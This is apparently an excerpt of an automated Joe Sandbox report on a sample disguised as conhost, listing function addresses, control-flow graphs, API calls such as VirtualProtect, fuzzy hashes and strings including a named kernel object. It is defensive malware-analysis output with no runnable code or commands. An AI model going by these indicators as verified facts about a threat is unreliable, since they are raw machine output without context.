                                                        • Instruction ID: b55cfd7427ebe33fae719129041132b8d8d412dbafadbc2bbdeb5cc16496c8e3
                                                        • Opcode Fuzzy Hash: 419951eec1e063c074906488a0681e11fdea5c088cbca47dd5ee791b47c177bd
                                                        • Instruction Fuzzy Hash: 2F21DFB1715A0292FA5BEB53F9487E923A0B76CBD0F444021FB1A476B4DB7A8986C300
                                                        Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 470 140001e10-140001e2d 471 140001e3e-140001e48 470->471 472 140001e2f-140001e38 470->472 473 140001ea3-140001ea8 471->473 474 140001e4a-140001e53 471->474 472->471 475 140001f60-140001f69 472->475 473->475 478 140001eae-140001eb3 473->478 476 140001e55-140001e60 474->476 477 140001ecc-140001ed1 474->477 476->473 481 140001f23-140001f2d 477->481 482 140001ed3-140001ee2 signal 477->482 479 140001eb5-140001eba 478->479 480 140001efb-140001f0a call 140005fb0 478->480 479->475 485 140001ec0 479->485 480->481 492 140001f0c-140001f10 480->492 483 140001f43-140001f45 481->483 484 140001f2f-140001f3f 481->484 482->481 486 140001ee4-140001ee8 482->486 483->475 484->483 485->481 488 140001eea-140001ef9 signal 486->488 489 140001f4e-140001f53 486->489 488->475 491 140001f5a 489->491 491->475 493 140001f12-140001f21 signal 492->493 494 140001f55 492->494 493->475 494->491
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 415efaae1520b6f9fe484d79ced22b069f4398e0d9568833d411c36de98fbb96
                                                        • Instruction ID: a97a33345abad997c7365aea4558d8e558d1aedc686b805e44c1795157921826
                                                        • Opcode Fuzzy Hash: 415efaae1520b6f9fe484d79ced22b069f4398e0d9568833d411c36de98fbb96
                                                        • Instruction Fuzzy Hash: FA2159B1A0110682FA77DA1BF5943FA1182ABCD7E4F258535BF19473F9DF3C88828241
                                                        Function 0000000140005A10 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 495 140005a10-140005a2c 496 140005a5b-140005a7f call 140005a00 495->496 497 140005a2e 495->497 502 140005ca6-140005cb8 496->502 504 140005a85-140005a99 call 140005a00 496->504 498 140005a35-140005a3a 497->498 500 140005a40-140005a43 498->500 500->502 503 140005a49-140005a4f 500->503 503->500 505 140005a51-140005a56 503->505 508 140005aaf-140005ac1 504->508 505->502 509 140005aa3-140005aad 508->509 510 140005ac3-140005add call 140005a00 508->510 509->508 511 140005b05-140005b08 509->511 515 140005adf-140005b01 call 140005a00 * 2 510->515 516 140005aa0 510->516 511->502 514 140005b0e-140005b3a call 140005a00 malloc 511->514 521 140005c9c 514->521 522 140005b40-140005b42 514->522 515->509 528 140005b03 515->528 516->509 521->502 522->521 523 140005b48-140005b78 call 140005a00 * 2 522->523 531 140005b80-140005b97 523->531 528->514 532 140005c73-140005c7b 531->532 533 140005b9d-140005ba3 531->533 536 140005c86-140005c94 532->536 537 140005c7d-140005c80 532->537 534 140005bf2 533->534 535 140005ba5-140005bc3 call 140005a00 533->535 540 140005bf7-140005c39 call 140005a00 * 2 534->540 543 140005bd0-140005bee 535->543 536->498 539 140005c9a 536->539 537->531 537->536 539->502 548 140005c68-140005c6f 540->548 549 140005c3b 540->549 543->543 546 140005bf0 543->546 546->540 548->532 550 140005c40-140005c4c 549->550 551 140005c63 550->551 552 140005c4e-140005c61 550->552 551->548 552->550 552->551
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: malloc
                                                        • String ID: \BaseNamedObjects\vnhmosoipghhk$dui7$dui7
                                                        • API String ID: 2803490479-772770072
                                                        • Opcode ID: 086f83d8c03b088d3742c86a81c4697aa14e2b73602f8399a692014a8352197d
                                                        • Instruction ID: c36a21544361166d9b38344f78d67b760febe83a9d66ae41515e7ed9e4a17036
                                                        • Opcode Fuzzy Hash: 086f83d8c03b088d3742c86a81c4697aa14e2b73602f8399a692014a8352197d
                                                        • Instruction Fuzzy Hash: 7C71CEB27106508BE756EF26A444BAB37A0F38EBD9F485214FF46577A1EB34D8808B41
                                                        Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 553 140001880-14000189c 554 1400018a2-1400018f9 call 140002420 call 140002660 553->554 555 140001a0f-140001a1f 553->555 554->555 560 1400018ff-140001910 554->560 561 140001912-14000191c 560->561 562 14000193e-140001941 560->562 563 14000194d-140001954 561->563 564 14000191e-140001929 561->564 562->563 565 140001943-140001947 562->565 568 140001956-140001961 563->568 569 14000199e-1400019a6 563->569 564->563 566 14000192b-14000193a 564->566 565->563 567 140001a20-140001a26 565->567 566->562 572 140001b87-140001b98 call 140001d40 567->572 573 140001a2c-140001a37 567->573 570 140001970-14000199c call 140001ba0 568->570 569->555 571 1400019a8-1400019c1 569->571 570->569 576 1400019df-1400019e7 571->576 573->569 577 140001a3d-140001a5f 573->577 580 1400019e9-140001a0d VirtualProtect 576->580 581 1400019d0-1400019dd 576->581 582 140001a7d-140001a97 577->582 580->581 581->555 581->576 583 140001b74-140001b82 call 140001d40 582->583 584 140001a9d-140001afa 582->584 583->572 590 140001b22-140001b26 584->590 591 140001afc-140001b0e 584->591 594 140001b2c-140001b30 590->594 595 140001a70-140001a77 590->595 592 140001b5c-140001b6c 591->592 593 140001b10-140001b20 591->593 592->583 596 140001b6f call 140001d40 592->596 593->590 593->592 594->595 597 140001b36-140001b57 call 140001ba0 594->597 595->569 595->582 596->583 597->592
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                        • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                        • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                        • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                        Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 601 140001800-140001810 602 140001812-140001822 601->602 603 140001824 601->603 604 14000182b-140001867 call 140002290 fprintf 602->604 603->604
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: f428f08e538914ca59def88db24ae18b893fca962c9c6f5a7a89ebfa17fbcd3a
                                                        • Instruction ID: e63b84dda4a6b6d332679af638f805f5fe9510bc58595bd3c76ad6bd03a5dd0b
                                                        • Opcode Fuzzy Hash: f428f08e538914ca59def88db24ae18b893fca962c9c6f5a7a89ebfa17fbcd3a
                                                        • Instruction Fuzzy Hash: A3F06271A14A4482E612EB6AB9417E96360E75D7C1F509211FF4D576A5DF3CD1828310
                                                        Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 607 14000219e-1400021a5 608 140002272-140002280 607->608 609 1400021ab-1400021c2 EnterCriticalSection 607->609 610 140002265-14000226c LeaveCriticalSection 609->610 611 1400021c8-1400021d6 609->611 610->608 612 1400021e9-1400021f5 TlsGetValue GetLastError 611->612 613 1400021f7-1400021fa 612->613 614 1400021e0-1400021e7 612->614 613->614 615 1400021fc-140002209 613->615 614->610 614->612 615->614
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                        • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                        • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                        • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200